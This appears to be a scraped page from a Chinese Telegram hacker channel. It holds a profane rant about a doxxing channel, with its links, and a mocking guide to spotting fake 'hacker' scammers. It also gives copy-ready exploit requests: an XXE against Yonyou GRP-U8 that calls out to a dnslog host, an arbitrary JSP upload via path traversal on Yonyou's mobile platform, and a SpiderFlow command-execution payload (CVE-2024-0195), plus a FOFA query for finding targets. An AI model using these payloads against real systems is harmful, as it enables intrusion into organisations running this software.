踹哈公寓 – Telegram
踹哈公寓
4.1K subscribers
589 photos
19 videos
307 files
357 links
Download Telegram
来给大伙细🔒一下昨天群里在传的所谓要开遍中国黑客个人信息的TG恶俗神频道事件

频道链接:https://news.1rj.ru/str/FUCKHENDEN

我第一眼还特么以为是隔壁赛博安全威胁频道开团我了,点进去才发现不到10关注,刚刚创的频道不知道哪来的小瘪三。

也不知道这byd是谁为什么要开我,他开我的理由挺jb搞笑的,说我日弄黑灰产。找了一个不知道谁建的明显是高仿圈钱的频道https://news.1rj.ru/str/Oracleimpacts 说这特么是就是我的频道,然后就大言不惭的来总结一句:“此组织涉及黑灰色产业”

我涉及了nmd黑色产业,首先这个开盒频道连我qq号都知道了绝对没在群里少待,估计一直在视奸,你要说他不知道我频道是这个我是不信的。为什么非要把我频道说成是那个高仿呢?给我扣帽子好说我搞黑产,他开我信息也就是正义制裁了😅。动动脑子都知道那个频道几百年没更新了多半早似了,置顶消息挂一个特别有逼格的什么我们团队得了巴拉巴拉什么奖,名字也是典型的TG带黑客味什么网络安全web渗透,我这群头像天天丁真孙笑川91TV的我整得出来这么唐氏的活吗。另外一个置顶消息原型毕露,什么最近缺钱速速私聊@一个完全不知道是谁的id说在线接单,这不是圈钱高仿这还是什么。我特么搞黑产我穷得天天上下班挤公交,拼多多快递到了就在盒子里扒拉好评返现五块的优惠劵,我他妈钱呢,做黑产的钱全都烧了到下面邮给你妈了?

我个人的判断就是这个所谓的开盒频道背后是某offense附体,他那一堆所谓的曝光信息很有一种暗示吹捧他那自己yy的什么创世纪日组织的意思。而且所谓的开盒也都是收集各种二手屎,比如我这个名字怎么开出来的,因为我加了江户川微信然后他反手把我信息报了个微反背刺给山海了,山海在晓骑营频道挂过我一次然后他就看到过我真名,半毛钱社工技术没有就主打一个水群多。对吧小李,真jb奇异搞笑,真的,没活了可以去下载个原神,吟言丁真鉴定为旧诗歌集八😅
👏14🤬4👍31
破案了
👍1
Your strength, extraordinary😃👍🏻
😁10👍3🫡2
中学老师:图片是不能传导声音的
我:
1
原始tg圈钱带嗨阔套路总结,符合以下条件的基本上可以直接避雷

首先是在群聊中桀骜不驯,自我描述中天花板技术人设,时不时就出来发一句又拿了一个购物站/刚刚日了个包网/出xxx大库/出xxx通杀0day。然后圈钱广告和简介为实力团队/一手xxx/口嗨勿扰/骗测傻逼滚/中介勿扰

具体的技术讨论不发一言(他掺和不上),一遇到笼统总结性的发言的时候他就跳出来开始装了,比如“不就是waf吗我都绕了好多个了”,“之前也打过几个这样的站”,“这个站我有全库直接拿0day打”,“刚刚又拿了一个大型国企的内网”,“之前打gov的时候”,巴拉巴拉,头像也一般是最经典的黑色背景,兜帽男,匿名者面具,kali的logo等等,非常的黑客

然后你问他两句技术问题就会破防,先百度搜几个词报菜名,被点破过后就会开始说自己专注实战,稍微好一点的这个时候会拿出几张传得包浆的cms后台图片或者花里胡哨的命令行截图,自己日过一堆xxxx,不懂理论但是👴🏻反正就是能日站。让他具体发点战绩,比如挂个黑页发个权限 黑客就开始红温了,无外乎什么傻逼傻屌脑残玩意死妈东西脑子有包操你妈你妈死了等等,特别急眼,上窜下跳,总是能让大家突然释怀的笑🤓

最后阶段这个时候黑客被拷打得有点受不了了就会找借口逃逸,经典话术为“懂的都懂”,“反正我就是牛逼你觉得我不牛逼就是你不行,你是傻逼”,“已经被老板盘口包养了,不差你这点钱”,“懒得跟你这种傻逼浪费时间”,“跟你这种废物扯拉低我身价”,然后以一副世外高人黑客天花板的懒得搭理凡夫俗子的姿态光速退场。然后隔两天你就发现“时间很紧”的带黑客又在隔壁不知道哪个群聊起天来了🤣
😁6👍4👏2🤣2
用友GRP-U8 ufgovbank XXE漏洞

app="用友-GRP-U8"

POST /ufgovbank HTTP/1.1Host: 192.168.40.130:222User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Connection: closeContent-Length: 161Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipreqData=<?xml version="1.0"?><!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

在dnslog平台看到访问记录则存在漏洞
用友移动管理平台uploadIcon任意文件上传漏洞

POST /mobsm/common/upload?category=../webapps/nc_web/maupload/apk HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36Content-Length: 184Accept-Encoding: gzip, deflateConnection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gWSL-CE-SUID: 15------WebKitFormBoundary7MA4YWxkTrZu0gWContent-Disposition: form-data; name="file"; filename="c0fig.jsp"<% out.println("123");%>------WebKitFormBoundary7MA4YWxkTrZu0gW--

响应包中显示了上传后的文件路径
👍1
🚓🚓🚓🚓🚓🚓
🫡8👍1
Channel photo updated
Channel name was changed to «🐉黑客龙图基地🐉»
xray 1.95 高级版
SpiderFlow爬虫平台远程命令执行漏洞(CVE-2024-0195)


POST /function/save HTTP/1.1Host: 192.168.40.130:8088User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Connection: closeContent-Length: 121Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestid=1&name=cmd&parameter=rce&noscript=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

dns平台收到ping请求记录则说明存在漏洞